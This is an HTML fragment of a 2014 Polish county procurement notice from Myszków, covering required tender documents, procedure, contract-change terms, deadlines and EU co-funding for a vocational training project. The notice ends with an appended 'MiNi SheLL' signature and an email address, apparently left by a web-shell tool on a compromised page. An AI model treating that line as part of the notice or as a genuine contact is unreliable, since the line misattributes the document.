</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Plan szkolenia - wzór Załącznik nr 1a do SIWZ
2. Dokument potwierdzający, że wykazane przez wykonawcę komputery posiadają legalne licencjonowane oprogramowanie -  Certyfikat legalności oprogramowania wydany przez jednostkę certyfikującą lub dokument równoważny.
3. Dokument potwierdzający posiadanie wydanego i/lub zatwierdzonego przez UDT programu szkolenia kierowcy/operatora wózków jezdniowych z bezpieczną wymianą butli gazowej</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę, wzór - Załącznik nr 1 do SIWZ
2. Dokumenty potwierdzające posiadanie uprawnień, pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych. 
3.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia na wzorze zamawiającego - Załącznik nr 9 do SIWZ lub inne dokumenty potwierdzające prawo wykonawcy do dysponowania zasobami innych podmiotów na okres korzystania z nich przy wykonywaniu zamówienia  - umowy najmu, dzierżawy, użyczenia itp</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje możliwość zmiany treści zawartej umowy, w następujących przypadkach:
a. wystąpienia siły wyższej - przez siłę wyższą należy rozumieć wydarzenie nieprzewidywalne i poza kontrolą Stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
b. ustawowej zmiany przepisów prawa w zakresie dotyczącym wykonania umowy, wystąpienia zmiany warunków realizacji Projektu - jeżeli wywołają konieczność zmiany zapisów niniejszej umowy,
c. przedłużenia terminu realizacji umowy w przypadku wystąpienia trudności organizacyjno technicznych z przyczyn niezależnych od Wykonawcy,                                
3.Zmiany w treści umowy mogą zostać wprowadzone po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.
4.Zmiany w treści umowy wymagają formy pisemnej w postaci aneksu do umowy, podpisanego przez strony umowy, pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatmyszkowski.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Myszkowie, ul. Pułaskiego 6, 42-300 Myszków, tel. (034) 315-91-00, fax. (034) 315-91-60, poczta elektroniczna (e-mail) starostwo@powiatmyszkowski.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Myszkowie ul. Pułaskiego 6, 42-300 Myszków Biuro podawcze na Sali Obsługi Interesantów (parter stanowisko nr 10).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Programu Operacyjnego Kapitał Ludzki pn. Mam zawód -mam pracę w regionie współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com